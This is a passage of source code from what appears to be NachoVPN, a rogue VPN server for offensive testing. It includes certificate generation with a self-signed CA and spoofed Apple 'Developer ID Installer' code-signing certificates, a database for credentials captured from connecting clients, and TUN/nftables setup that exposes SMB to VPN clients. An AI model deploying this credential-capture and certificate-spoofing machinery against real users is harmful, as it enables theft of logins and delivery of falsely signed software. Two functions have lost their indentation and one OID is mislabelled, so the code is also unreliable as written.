    # skip certificate validation if we're overriding the thumbprint or retrieving it dynamically from the server
    # this allows us to keep serving our origin certificate while advertising the proxy thumbprint
    # this is needed for certain proxies which require the origin has a valid certificate
    # if we didn't do this, the cert manager would detect a mismatch and re-generate the certificate
    if os.getenv('USE_DYNAMIC_SERVER_THUMBPRINT', 'false').lower() == 'true' or \
            os.getenv('SERVER_SHA1_THUMBPRINT', '') != '' or \
            os.getenv('SERVER_MD5_THUMBPRINT', '') != '':
        return True
    with open(cert_path, 'rb') as f:
        cert = x509.load_pem_x509_certificate(f.read(), default_backend())
    # reject certificates outside their validity window
    date_valid = (cert.not_valid_before_utc \
        <= datetime.datetime.now(datetime.timezone.utc) \
        <= cert.not_valid_after_utc)
    if not date_valid:
        logging.error(f"Certificate for {common_name} is expired")
        return False
    # the subject Common Name must exactly match the requested name
    cert_common_name = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value
    name_valid = cert_common_name == common_name
    if not name_valid:
        logging.error(f"Certificate for {cert_common_name} is not valid for {common_name}")
        return False
    # check if the issuer Common Name matches our self-signed CA
    # if the issuer name matches, but the cert is not validly signed by the current CA, return False
    # this helps to identify stale certificates when the CA certificate has been re-generated
    if cert.issuer.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value == self.ca_common_name:
        try:
            # NOTE(review): PKCS1v15 verification assumes the CA key is RSA
            # -- confirm against generate_ca_certificate
            self.ca_cert.public_key().verify(
                cert.signature,
                cert.tbs_certificate_bytes,
                padding.PKCS1v15(),
                cert.signature_hash_algorithm,
            )
            logging.info(f"Certificate is validly signed by our CA. Will not re-generate.")
        except Exception as e:
            logging.warning(f"Certificate is not validly signed by the current CA: {e}. Will re-generate.")
            return False
    else:
        # if the cert wasn't issued by our CA, then it's probably been signed by a public CA,
        # such as Let's Encrypt, and we should not re-generate it.
        # TODO: we may wish to check that the cert chains to a trusted root CA in the future,
        # but it doesn't really matter for our use case
        logging.warning(f"Certificate was not issued by our CA. Will not re-generate.")
        return True
    return True
def get_thumbprint_from_server(self, server_address):
    """Fetch the thumbprints of the certificate presented by a remote server.

    Connects to server_address on port 443, completes a TLS handshake, and
    hashes the peer's DER-encoded certificate.

    Returns:
        Dict with uppercase hex 'sha1' and 'md5' digests, or None on any
        connection/TLS failure (logged as an error).
    """
    try:
        tls_context = ssl.create_default_context()
        with socket.create_connection((server_address, 443), timeout=5) as raw_sock:
            with tls_context.wrap_socket(raw_sock, server_hostname=server_address) as tls_sock:
                peer_der = tls_sock.getpeercert(binary_form=True)
        return {
            'sha1': hashlib.sha1(peer_der).hexdigest().upper(),
            'md5': hashlib.md5(peer_der).hexdigest().upper(),
        }
    except (socket.timeout, ssl.SSLError, ssl.CertificateError, OSError) as exc:
        logging.error(f"Error getting thumbprint from server {server_address}: {exc}")
        return None
def get_cert_thumbprint(self, cert_path):
    """Compute the SHA1/MD5 thumbprints of a PEM certificate on disk.

    The SERVER_SHA1_THUMBPRINT / SERVER_MD5_THUMBPRINT environment variables
    override the computed values (useful for fronting/proxy scenarios).

    Returns:
        Dict with uppercase hex 'sha1' and 'md5' thumbprints.
    """
    with open(cert_path, 'rb') as pem_file:
        certificate = x509.load_pem_x509_certificate(pem_file.read(), default_backend())
    der_bytes = certificate.public_bytes(serialization.Encoding.DER)
    sha1_hex = hashlib.sha1(der_bytes).hexdigest().upper()
    md5_hex = hashlib.md5(der_bytes).hexdigest().upper()
    # Environment overrides take precedence over the computed digests
    return {
        'sha1': os.getenv('SERVER_SHA1_THUMBPRINT', sha1_hex),
        'md5': os.getenv('SERVER_MD5_THUMBPRINT', md5_hex),
    }
def generate_server_certificate(self, cert_path, key_path, common_name="*", additional_ekus=[], additional_sans=[]):
"""Generate a server certificate"""
# Get CA cert
if not self.ca_cert or not self.ca_key:
self.load_ca_certificate()
# Generate server private key
cert_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
# Build server certificate signed by CA
subject = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, common_name),
])
# list of SANs
san_list = additional_sans
# list of EKUs
eku_list = [
ExtendedKeyUsageOID.SERVER_AUTH,
ExtendedKeyUsageOID.CLIENT_AUTH,
] + additional_ekus
key_usage = x509.KeyUsage(
digital_signature=True,
key_encipherment=False,
content_commitment=False,
data_encipherment=False,
key_agreement=False,
encipher_only=False,
decipher_only=False,
key_cert_sign=False,
crl_sign=False
)
cert = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
self.ca_cert.subject
).public_key(
cert_key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.datetime.utcnow() - datetime.timedelta(days=1)
).not_valid_after(
datetime.datetime.utcnow() + datetime.timedelta(days=365)
).add_extension(
x509.SubjectAlternativeName(san_list),
critical=False,
).add_extension(
x509.ExtendedKeyUsage(eku_list),
critical=True,
).add_extension(
key_usage,
critical=True,
).sign(self.ca_key, hashes.SHA256(), default_backend())
# Convert certificate and key to PEM format
cert_pem = cert.public_bytes(serialization.Encoding.PEM)
key_pem = cert_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption()
)
with open(cert_path, 'wb') as cert_file:
cert_file.write(cert_pem + self.ca_cert.public_bytes(serialization.Encoding.PEM))
with open(key_path, 'wb') as key_file:
key_file.write(key_pem)
return cert_path, key_path
    def generate_ca_certificate(self):
        """Load the CA key/cert from disk if present, otherwise generate a new
        self-signed CA valid for ~10 years and persist it unencrypted.

        Returns:
            tuple: (ca_key_path, ca_cert_path) of the PEM files on disk.
        """
        self.ca_key_path = os.path.join(self.cert_dir, 'ca.key')
        self.ca_cert_path = os.path.join(self.cert_dir, 'ca.crt')
        # Check if CA cert already exists; if so, load and reuse it
        if os.path.exists(self.ca_cert_path) and os.path.exists(self.ca_key_path):
            logging.info("Loading existing CA certificate")
            with open(self.ca_cert_path, 'rb') as f:
                self.ca_cert = x509.load_pem_x509_certificate(f.read(), default_backend())
            with open(self.ca_key_path, 'rb') as f:
                # key is stored unencrypted, hence password=None
                self.ca_key = serialization.load_pem_private_key(f.read(), password=None, backend=default_backend())
            return self.ca_key_path, self.ca_cert_path
        logging.info("Generating new CA certificate")
        # Generate CA private key (2048-bit RSA)
        self.ca_key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
            backend=default_backend()
        )
        # Build CA certificate (self-signed: subject == issuer)
        subject = x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, self.ca_common_name),
            #x509.NameAttribute(NameOID.ORGANIZATION_NAME, self.ca_common_name),
        ])
        self.ca_cert = x509.CertificateBuilder().subject_name(
            subject
        ).issuer_name(
            subject
        ).public_key(
            self.ca_key.public_key()
        ).serial_number(
            x509.random_serial_number()
        ).not_valid_before(
            # backdate one day to tolerate client clock skew
            datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=1)
        ).not_valid_after(
            # ~10-year lifetime
            datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=3650)
        ).add_extension(
            # CA=True so this cert can sign leaf certificates
            x509.BasicConstraints(ca=True, path_length=None),
            critical=True
        ).add_extension(
            x509.SubjectKeyIdentifier.from_public_key(self.ca_key.public_key()),
            critical=False
        ).add_extension(
            x509.AuthorityKeyIdentifier.from_issuer_public_key(self.ca_key.public_key()),
            critical=False
        ).sign(self.ca_key, hashes.SHA256(), default_backend())
        # Save CA cert and key (key written unencrypted)
        with open(self.ca_cert_path, 'wb') as f:
            f.write(self.ca_cert.public_bytes(serialization.Encoding.PEM))
        with open(self.ca_key_path, 'wb') as f:
            f.write(self.ca_key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.TraditionalOpenSSL,
                encryption_algorithm=serialization.NoEncryption()
            ))
        return self.ca_key_path, self.ca_cert_path
    def generate_codesign_certificate(self, common_name, pfx_path=None, cert_path=None, key_path=None):
        """Create (or reuse) a CA-signed code-signing certificate and export it
        as an unencrypted PKCS#12 bundle.

        Args:
            common_name: subject CN for the certificate.
            pfx_path: output path for the PKCS#12 bundle (default: cert_dir/codesign.pfx).
            cert_path: output path for the PEM certificate (default: cert_dir/codesign.cer).
            key_path: output path for the PEM key (default: cert_dir/codesign.key).

        Returns:
            str: path to the PKCS#12 (.pfx) bundle.
        """
        # Ensure the CA is available for signing
        if not self.ca_cert or not self.ca_key:
            self.load_ca_certificate()
        if pfx_path is None:
            pfx_path = os.path.join(self.cert_dir, 'codesign.pfx')
        if cert_path is None:
            cert_path = os.path.join(self.cert_dir, 'codesign.cer')
        if key_path is None:
            key_path = os.path.join(self.cert_dir, 'codesign.key')
        # Reuse existing files when all three are present and the cert is valid
        if os.path.exists(cert_path) and os.path.exists(key_path) and \
                os.path.exists(pfx_path) and self.cert_is_valid(cert_path, common_name):
            logging.info(f"Loading existing codesigning certificate for: {common_name}")
            return pfx_path
        else:
            logging.info(f"Generating new codesigning certificate for: {common_name}")
        # Generate a private key for the code signing certificate
        codesign_private_key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
            backend=default_backend()
        )
        # Create the code signing certificate
        subject = x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, common_name)
        ])
        # Only the CODE_SIGNING EKU is required
        eku_list = [
            ExtendedKeyUsageOID.CODE_SIGNING,
        ]
        key_usage = x509.KeyUsage(
            digital_signature=True,
            key_encipherment=False,
            content_commitment=False,
            data_encipherment=False,
            key_agreement=False,
            encipher_only=False,
            decipher_only=False,
            key_cert_sign=False,
            crl_sign=False
        )
        builder = x509.CertificateBuilder().subject_name(
            subject
        ).issuer_name(
            self.ca_cert.subject
        ).public_key(
            codesign_private_key.public_key()
        ).serial_number(
            x509.random_serial_number()
        ).not_valid_before(
            # backdate one day to tolerate clock skew
            datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=1)
        ).not_valid_after(
            datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=365)
        ).add_extension(
            x509.ExtendedKeyUsage(eku_list),
            critical=True,
        ).add_extension(
            key_usage,
            critical=True,
        )
        # Sign the certificate with the CA private key
        codesign_certificate = builder.sign(self.ca_key, hashes.SHA256(), default_backend())
        # Save the new certificate to a file
        with open(cert_path, 'wb') as f:
            f.write(codesign_certificate.public_bytes(serialization.Encoding.PEM))
        with open(key_path, 'wb') as f:
            f.write(codesign_private_key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.TraditionalOpenSSL,
                encryption_algorithm=serialization.NoEncryption()
            ))
        # Convert to pkcs12 and save to codesign.pfx (no CA chain, no passphrase)
        logging.info(f"Saving codesigning certificate to {pfx_path}")
        with open(pfx_path, "wb") as f:
            f.write(serialization.pkcs12.serialize_key_and_certificates(
                b"codesign",
                codesign_private_key,
                codesign_certificate,
                None,
                serialization.NoEncryption()
            ))
        return pfx_path
def generate_apple_certificate(self, common_name="Developer ID Installer", cert_path=None, key_path=None):
"""Generate an Apple code signing certificate"""
if cert_path is None:
cert_path = os.path.join(self.cert_dir, 'apple.cer')
if key_path is None:
key_path = os.path.join(self.cert_dir, 'apple.key')
# Generate a private key
apple_private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
# Create Apple signing certificate
subject = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, common_name)
])
# list of EKUs
eku_list = [
ExtendedKeyUsageOID.CODE_SIGNING,
ObjectIdentifier("1.2.840.113635.100.6.1.14"), # Apple Developer ID Installer
ObjectIdentifier("1.2.840.113635.100.4.13"), # Apple Package Signing
ObjectIdentifier("1.2.840.113635.100.6.1.14"), # Apple Extension Signing
]
key_usage = x509.KeyUsage(
digital_signature=True,
key_encipherment=False,
content_commitment=False,
data_encipherment=False,
key_agreement=False,
encipher_only=False,
decipher_only=False,
key_cert_sign=False,
crl_sign=False
)
builder = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
self.ca_cert.subject
).public_key(
apple_private_key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.datetime.utcnow() - datetime.timedelta(days=1)
).not_valid_after(
datetime.datetime.utcnow() + datetime.timedelta(days=365)
).add_extension(
x509.ExtendedKeyUsage(eku_list),
critical=True,
).add_extension(
key_usage,
critical=True,
)
# Sign the certificate with the CA private key
apple_certificate = builder.sign(self.ca_key, hashes.SHA256(), default_backend())
# Save the new certificate to a file
with open(cert_path, 'wb') as f:
f.write(apple_certificate.public_bytes(serialization.Encoding.PEM))
# Save the private key
with open(key_path, 'wb') as f:
f.write(apple_private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption()
))
return cert_path, key_path
================================================
FILE: src/nachovpn/core/db_manager.py
================================================
from datetime import datetime
import sqlite3
import logging
import json
import threading
class DBManager:
    """Thread-safe SQLite store for credentials captured by VPN plugins.

    A single connection is shared across threads (check_same_thread=False);
    writes are serialized with an internal lock.
    """

    def __init__(self, db_path='database.db'):
        """Open (or create) the database at *db_path* and ensure the schema exists."""
        self.db_path = db_path
        self.conn = None
        self.lock = threading.Lock()
        self.setup_database()

    def setup_database(self):
        """Initialize the database connection and create tables if they don't exist.

        Raises:
            sqlite3.Error: if the database cannot be opened or initialized.
        """
        try:
            # check_same_thread=False lets request-handler threads share this
            # connection; self.lock guards concurrent writes.
            self.conn = sqlite3.connect(self.db_path, check_same_thread=False)
            cursor = self.conn.cursor()
            cursor.execute('''
                CREATE TABLE IF NOT EXISTS credentials (
                    timestamp DATETIME DEFAULT CURRENT_TIMESTAMP,
                    username TEXT,
                    password TEXT,
                    other TEXT,
                    plugin TEXT
                )
            ''')
            self.conn.commit()
            logging.info(f"Database initialized successfully at {self.db_path}")
        except sqlite3.Error as e:
            logging.error(f"Database initialization error: {e}")
            raise

    def log_credentials(self, username, password, plugin_name, other_data=None):
        """Log credentials using prepared statements.

        Args:
            username: captured username.
            password: captured password.
            plugin_name: name of the plugin that captured the credentials.
            other_data: optional JSON-serializable extras, stored in 'other'.

        Errors are logged rather than raised so a logging failure never
        breaks the VPN request path.
        """
        # Fix: guard against use after close() instead of raising on a
        # dangling/closed connection.
        if self.conn is None:
            logging.error("Cannot log credentials: database connection is closed")
            return
        try:
            with self.lock:
                cursor = self.conn.cursor()
                cursor.execute(
                    'INSERT INTO credentials (username, password, other, plugin) VALUES (?, ?, ?, ?)',
                    (username, password, json.dumps(other_data) if other_data else None, plugin_name)
                )
                self.conn.commit()
        except sqlite3.Error as e:
            logging.error(f"Error logging credentials: {e}")

    def close(self):
        """Close the database connection. Safe to call more than once."""
        if self.conn:
            with self.lock:
                self.conn.close()
                # Fix: drop the reference so later calls (close or
                # log_credentials) don't touch a closed connection.
                self.conn = None
================================================
FILE: src/nachovpn/core/ip_manager.py
================================================
from __future__ import annotations
import ipaddress, itertools, threading, time, os
# Seconds of inactivity before a lease may be reclaimed (env-overridable).
LEASE_SECS = int(os.getenv("LEASE_SECS", 5 * 60))
# Subnet from which client addresses are allocated.
VPN_SUBNET = "10.10.0.0/16"


class IPPool:
    """Round-robin allocator with lease/idle-timeout."""

    def __init__(self, cidr: str = VPN_SUBNET):
        """Build the pool over *cidr* and permanently reserve the gateway."""
        self.net = ipaddress.ip_network(cidr)
        self.host_iter = itertools.cycle(self.net.hosts())
        self.lock = threading.Lock()
        # Maps allocated ip string -> epoch seconds when it was last seen.
        self.inuse: dict[str, float] = {}
        # The first host acts as the gateway; an infinite timestamp means
        # its lease never expires, so it is never handed out.
        gateway = str(next(self.host_iter))
        self.inuse[gateway] = float('inf')

    def alloc(self) -> str:
        """Hand out the next free (or lease-expired) host address.

        Raises:
            RuntimeError: when every address is currently leased.
        """
        now = time.time()
        with self.lock:
            remaining = self.net.num_addresses - 2
            while remaining > 0:
                candidate = str(next(self.host_iter))
                if now - self.inuse.get(candidate, 0) > LEASE_SECS:
                    self.inuse[candidate] = now
                    return candidate
                remaining -= 1
            raise RuntimeError("Address pool exhausted")

    def touch(self, ip: str):
        """Call whenever we see traffic from ip to keep the lease alive."""
        with self.lock:
            if ip in self.inuse:
                self.inuse[ip] = time.time()

    def release(self, ip: str):
        """Return *ip* to the pool immediately (no-op if not leased)."""
        with self.lock:
            self.inuse.pop(ip, None)
================================================
FILE: src/nachovpn/core/packet_handler.py
================================================
from pyroute2 import AsyncIPRoute
from dataclasses import dataclass, field
from nachovpn.core.ip_manager import IPPool
from scapy.layers.l2 import Ether
from scapy.packet import Raw
from scapy.utils import PcapWriter
import nftables
import asyncio
import os
import logging
import ipaddress
import socket
import time
import uuid
import struct
import fcntl
import threading
# Maximum transmission unit for the TUN device, in bytes (env-overridable).
TUNNEL_MTU = int(os.getenv("TUNNEL_MTU", 1400))
LEASE_SECS = int(os.getenv("LEASE_SECS", 5 * 60))  # 5 minutes
LEASE_CLEANUP_INTERVAL = int(os.getenv("LEASE_CLEANUP_INTERVAL", 60))  # 1 minute
# Subnet from which VPN client addresses are allocated.
VPN_SUBNET = "10.10.0.0/16"
# Tunnel forwarding control
TUNNEL_PRIVATE = os.getenv("TUNNEL_PRIVATE", "false").lower() == "true"
TUNNEL_FULL = os.getenv("TUNNEL_FULL", "false").lower() == "true"
# Tunneling needs a TUN device, so it is disabled on Windows (os.name == 'nt').
TUNNEL_ENABLED = (TUNNEL_PRIVATE or TUNNEL_FULL) and os.name != 'nt'
# Linux TUN/TAP ioctl constants (see linux/if_tun.h).
IFF_NO_PI = 0x1000
TUNSETIFF = 0x400454CA
IFF_TUN = 0x0001
@dataclass
class ClientInfo:
    """Information about a connected client"""
    # Socket used to push wrapped reply packets back to the client.
    sock: socket.socket
    # VPN IP address assigned to this client.
    ip_address: str
    # Unique identifier of the client connection.
    connection_id: str
    # Plugin-supplied wrapper invoked as callback(packet_data, client) on
    # reply packets before they are queued for sending.
    callback: callable
    # Epoch timestamp of last observed activity; used for lease expiry.
    last_seen: float = field(default_factory=time.time)
class PacketHandler:
"""
TUN-based packet handler using nftables
"""
    def __init__(self, write_pcap=False, pcap_filename=None):
        """Initialize packet handler.

        Args:
            write_pcap: when True, client packets are also appended to a PCAP file.
            pcap_filename: path of the PCAP file (used only when write_pcap is set).

        Note: the event loop (self._loop) and TUN setup happen later in start(),
        not here.
        """
        self.logger = logging.getLogger(__name__)
        self.write_pcap = write_pcap
        self.pcap_filename = pcap_filename
        self._pcap_writer = None
        self.logger.debug(f"[TUN] PacketHandler instantiated in thread {threading.current_thread().name}")
        # Initialize pyroute2 and nftables
        self._ipr = AsyncIPRoute()
        self.nft = nftables.Nftables()
        # TUN interface name
        self.tun_name = "nacho0"
        # Client management
        self.clients = {}  # ip_address -> ClientInfo
        self.conn_to_ip = {}  # connection_id -> ip_address
        self.ip_pool = IPPool(VPN_SUBNET)
        self.client_lock = asyncio.Lock()
        self.connection_states = {}  # connection_id -> bool (True if connection is alive)
        # Packet queuing
        self.packet_queues = {}  # connection_id -> asyncio.Queue
        self.send_tasks = {}  # connection_id -> asyncio.Task
        # Cache TUN file descriptor
        self.tun_fd = None
        # Background tasks
        self._lease_cleanup_task = None
        self._closed = False
    def _setup_nftables(self):
        """Configure nftables rules for the VPN.

        Creates an 'inet vpn' table with input/forward/nat chains that:
        allow SMB (TCP 445) from the VPN subnet to the gateway, drop all other
        traffic arriving on the TUN interface, and (when TUNNEL_FULL) forward
        and masquerade client traffic to the internet while blocking
        private/LAN, metadata, broadcast and multicast destinations. Also
        clamps TCP MSS to TUNNEL_MTU and warns if IP forwarding is off.

        Raises:
            RuntimeError: if the rule set cannot be applied.
        """
        try:
            # First try to flush and delete existing table (best-effort; it
            # may not exist yet)
            try:
                self.nft.cmd('flush table inet vpn')
                self.nft.cmd('delete table inet vpn')
                self.logger.info("Flushed existing nftables rules")
            except Exception as e:
                self.logger.warning(f"Error flushing existing rules: {e}")
            # MSS clamp to TUNNEL_MTU
            tcp_mss = TUNNEL_MTU
            # Get the gateway IP (first host in the subnet)
            subnet = ipaddress.ip_network(VPN_SUBNET)
            gateway_ip = str(next(subnet.hosts()))
            # Get addr / len from VPN_SUBNET
            vpn_addr, vpn_len = VPN_SUBNET.split("/")
            # Log the tunnel forwarding configuration
            self.logger.info(f"Tunnel forwarding configuration: TUNNEL_PRIVATE={TUNNEL_PRIVATE}, TUNNEL_FULL={TUNNEL_FULL}")
            # Build nftables rules (libnftables JSON schema)
            rules = [
                {
                    "add": {
                        "table": {
                            "family": "inet",
                            "name": "vpn"
                        }
                    }
                },
                {
                    "add": {
                        "chain": {
                            "family": "inet",
                            "table": "vpn",
                            "name": "input",
                            "type": "filter",
                            "hook": "input",
                            "prio": 0,
                            "policy": "accept"
                        }
                    }
                },
                {
                    # forward chain defaults to drop; explicit accept rules below
                    "add": {
                        "chain": {
                            "family": "inet",
                            "table": "vpn",
                            "name": "forward",
                            "type": "filter",
                            "hook": "forward",
                            "prio": 0,
                            "policy": "drop"
                        }
                    }
                },
                {
                    "add": {
                        "chain": {
                            "family": "inet",
                            "table": "vpn",
                            "name": "postroute",
                            "type": "nat",
                            "hook": "postrouting",
                            "prio": 100
                        }
                    }
                },
                {
                    "add": {
                        "chain": {
                            "family": "inet",
                            "table": "vpn",
                            "name": "preroute",
                            "type": "nat",
                            "hook": "prerouting",
                            "prio": -100
                        }
                    }
                },
                # Allow TCP 445 to gateway IP from VPN subnet
                {
                    "add": {
                        "rule": {
                            "family": "inet",
                            "table": "vpn",
                            "chain": "input",
                            "expr": [
                                {"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}},
                                {"match": {"left": {"payload": {"protocol": "ip", "field": "saddr"}}, "op": "in", "right": {"prefix": {"addr": vpn_addr, "len": int(vpn_len)}}}},
                                {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "==", "right": gateway_ip}},
                                {"match": {"left": {"payload": {"protocol": "tcp", "field": "dport"}}, "op": "==", "right": 445}},
                                {"accept": None}
                            ]
                        }
                    }
                },
                # Default drop for all other VPN interface traffic
                {
                    "add": {
                        "rule": {
                            "family": "inet",
                            "table": "vpn",
                            "chain": "input",
                            "expr": [
                                {"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}},
                                {"drop": None}
                            ]
                        }
                    }
                },
                # Accept established/related
                {
                    "add": {
                        "rule": {
                            "family": "inet",
                            "table": "vpn",
                            "chain": "forward",
                            "expr": [
                                {"match": {"left": {"ct": {"key": "state"}}, "op": "in", "right": {"set": ["established", "related"]}}},
                                {"accept": None}
                            ]
                        }
                    }
                },
                # Drop traffic to the gateway IP
                {
                    "add": {
                        "rule": {
                            "family": "inet",
                            "table": "vpn",
                            "chain": "forward",
                            "expr": [
                                {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "==", "right": gateway_ip}},
                                {"drop": None}
                            ]
                        }
                    }
                }
            ]
            # Add forwarding rules if TUNNEL_FULL is enabled
            if TUNNEL_FULL:
                self.logger.info("Adding internet forwarding rules - VPN clients can access the internet")
                # Drop traffic to private/LAN ranges (includes the cloud
                # metadata address 169.254.169.254)
                rules.append({
                    "add": {
                        "rule": {
                            "family": "inet",
                            "table": "vpn",
                            "chain": "forward",
                            "expr": [
                                {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "in", "right": {"set": [
                                    {"prefix": {"addr": "10.0.0.0", "len": 8}},
                                    {"prefix": {"addr": "127.0.0.0", "len": 8}},
                                    {"prefix": {"addr": "169.254.169.254", "len": 32}},
                                    {"prefix": {"addr": "172.16.0.0", "len": 12}},
                                    {"prefix": {"addr": "192.168.0.0", "len": 16}}
                                ]}}},
                                {"drop": None}
                            ]
                        }
                    }
                })
                # Drop broadcast and multicast traffic
                rules.append({
                    "add": {
                        "rule": {
                            "family": "inet",
                            "table": "vpn",
                            "chain": "forward",
                            "expr": [
                                {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "in", "right": {"set": [
                                    {"prefix": {"addr": "224.0.0.0", "len": 4}},
                                    {"prefix": {"addr": "255.255.255.255", "len": 32}}
                                ]}}},
                                {"drop": None}
                            ]
                        }
                    }
                })
                # Accept all other VPN client traffic to the internet
                rules.append({
                    "add": {
                        "rule": {
                            "family": "inet",
                            "table": "vpn",
                            "chain": "forward",
                            "expr": [
                                {"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}},
                                {"accept": None}
                            ]
                        }
                    }
                })
                # Masquerade traffic from VPN subnet leaving on any other interface
                rules.append({
                    "add": {
                        "rule": {
                            "family": "inet",
                            "table": "vpn",
                            "chain": "postroute",
                            "expr": [
                                {"match": {"left": {"payload": {"protocol": "ip", "field": "saddr"}}, "op": "in", "right": {"prefix": {"addr": vpn_addr, "len": int(vpn_len)}}}},
                                {"match": {"left": {"meta": {"key": "oifname"}}, "op": "!=", "right": self.tun_name}},
                                {"masquerade": None}
                            ]
                        }
                    }
                })
            else:
                self.logger.info("Internet forwarding disabled - VPN clients can only access SMB share")
            cmd = {"nftables": rules}
            # Apply nftables rules
            rc, _, err = self.nft.json_cmd(cmd)
            if rc:
                raise RuntimeError(f"Failed to apply nftables rules: {err}")
            self.logger.info("Configured nftables rules")
            # Check if IP forwarding is enabled (informational only; we do
            # not change the sysctl ourselves)
            try:
                with open('/proc/sys/net/ipv4/ip_forward', 'r') as f:
                    ip_forward = f.read().strip()
                if ip_forward != '1':
                    self.logger.error(f"IP forwarding is not enabled. Please enable it with: sudo sysctl -w net.ipv4.ip_forward=1")
                self.logger.info("IP forwarding is enabled")
            except FileNotFoundError:
                self.logger.error("Cannot read IP forwarding status from /proc/sys/net/ipv4/ip_forward. Please ensure IP forwarding is enabled with: sudo sysctl -w net.ipv4.ip_forward=1")
            # Add MSS clamping rules (text commands; simpler than the JSON form)
            try:
                self.nft.cmd(f'add rule inet vpn forward iifname {self.tun_name} ip saddr 10.10.0.0/16 tcp flags syn tcp option maxseg size set {tcp_mss}')
                self.nft.cmd(f'add rule inet vpn forward oifname {self.tun_name} ip daddr 10.10.0.0/16 tcp flags syn tcp option maxseg size set {tcp_mss}')
                self.logger.info(f"Added TCP MSS clamping rules with MSS {tcp_mss}")
            except Exception as e:
                self.logger.error(f"Failed to add TCP MSS clamping rules: {e}")
                raise
            # Verify rules were applied
            try:
                result = self.nft.cmd('list ruleset')
                self.logger.debug(f"Current nftables rules: {result}")
            except Exception as e:
                self.logger.error(f"Failed to list rules: {e}")
        except Exception as e:
            self.logger.error(f"Failed to configure nftables: {e}")
            raise
    async def _setup_tun_interface(self):
        """Create and configure the TUN interface.

        Removes any pre-existing interface with the same name, creates a
        fresh TUN device, sets its MTU, brings it up, assigns the gateway
        address (first host of VPN_SUBNET) and disables IPv6 on it.

        Raises:
            Exception: re-raised after logging if any netlink step fails.
        """
        try:
            # Remove any stale interface left over from a previous run
            idx = await self._ipr.link_lookup(ifname=self.tun_name)
            if idx:
                self.logger.info("Removing existing interface %s", self.tun_name)
                await self._ipr.link("del", index=idx[0])
            # Create TUN interface (IFF_NO_PI: no packet-info header prepended)
            await self._ipr.link(
                "add",
                ifname=self.tun_name,
                kind="tuntap",
                mode="tun",
                iflags=IFF_TUN | IFF_NO_PI
            )
            # Get interface info
            idx = (await self._ipr.link_lookup(ifname=self.tun_name))[0]
            info = await self._ipr.link("get", index=idx)
            self.logger.debug(f"[TUN] Interface created with flags: {info[0]['flags']}")
            # Set MTU and bring the interface up
            await self._ipr.link("set", index=idx, mtu=TUNNEL_MTU, state="up")
            self.logger.info(f"[TUN] Set interface MTU to {TUNNEL_MTU} bytes")
            # Assign the gateway address (first host of the VPN subnet)
            subnet = ipaddress.ip_network(VPN_SUBNET)
            gateway_ip = str(next(subnet.hosts()))
            await self._ipr.addr("add", index=idx, address=gateway_ip,
                                 prefixlen=subnet.prefixlen)
            self.logger.info("Created %s %s/%s",
                             self.tun_name, gateway_ip, subnet.prefixlen)
            # Disable IPv6 on the nacho0 interface (best-effort)
            ipv6_disable_path = f"/proc/sys/net/ipv6/conf/{self.tun_name}/disable_ipv6"
            if os.path.exists(ipv6_disable_path):
                try:
                    with open(ipv6_disable_path, "w") as f:
                        f.write("1\n")
                    self.logger.info(f"Disabled IPv6 on {self.tun_name}")
                except Exception as e:
                    self.logger.warning(f"Failed to disable IPv6 on {self.tun_name}: {e}")
        except Exception:
            self.logger.exception("Failed to create TUN interface")
            raise
    def _setup_tun_fd(self) -> None:
        """Open /dev/net/tun and bind it to the nacho0 interface.

        The fd is opened non-blocking, bound to self.tun_name via the
        TUNSETIFF ioctl, stored in self.tun_fd, and registered with the
        event loop so _on_tun_ready fires when packets arrive.

        Raises:
            Exception: re-raised after logging if the device cannot be opened.
        """
        try:
            # Open the TUN character device
            fd = os.open("/dev/net/tun", os.O_RDWR | os.O_NONBLOCK)
            self.logger.debug(f"[TUN] Opened /dev/net/tun with fd={fd}")
            # Tell the kernel which interface this fd belongs to
            # (struct ifreq: 16-byte name + short flags)
            ifr = struct.pack(
                "16sH",
                self.tun_name.encode(),
                IFF_TUN | IFF_NO_PI
            )
            self.logger.debug(f"[TUN] Setting interface flags: IFF_TUN={IFF_TUN}, IFF_NO_PI={IFF_NO_PI}")
            fcntl.ioctl(fd, TUNSETIFF, ifr)
            self.logger.debug(f"[TUN] Bound fd={fd} to interface {self.tun_name}")
            # Store and register with the event loop
            self.tun_fd = fd
            self._loop.add_reader(fd, self._on_tun_ready)
            self.logger.debug(f"[TUN] Registered fd={fd} with event loop")
        except Exception as e:
            self.logger.error(f"[TUN] Failed to open TUN file descriptor: {e}")
            raise
    def _on_tun_ready(self):
        """Synchronous callback when TUN fd is ready for reading.

        Reads one packet from the TUN device, ignores anything that is not
        IPv4, extracts the destination address from the IP header and
